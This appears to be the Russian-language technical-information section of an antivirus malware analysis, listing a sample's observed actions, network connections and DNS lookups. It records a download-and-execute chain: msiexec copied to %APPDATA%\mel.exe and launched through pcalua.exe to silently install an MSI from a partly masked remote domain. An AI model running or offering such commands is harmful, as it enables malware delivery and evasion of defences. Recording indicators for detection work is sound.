Техническая информация
- '<SYSTEM32>\expand.exe' <SYSTEM32>\msiexec.exe %APPDATA%\mel.exe
- '<SYSTEM32>\pcalua.exe' -a %APPDATA%\mel -c /Q /i http://dp#.###onstmarket.com/veafdsag.msi?de##############
- '%APPDATA%\mel.exe' /Q /i http://dp#.###onstmarket.com/veafdsag.msi?de##############
- %APPDATA%\mel.exe
- 'dp#.###onstmarket.com':80
- 'sh####tmarket.com':443
- http://dp#.###onstmarket.com/veafdsag.msi?de##############
- http://sh####tmarket.com/
- 'dp#.###onstmarket.com':443
- DNS ASK dp#.###onstmarket.com
- DNS ASK sh####tmarket.com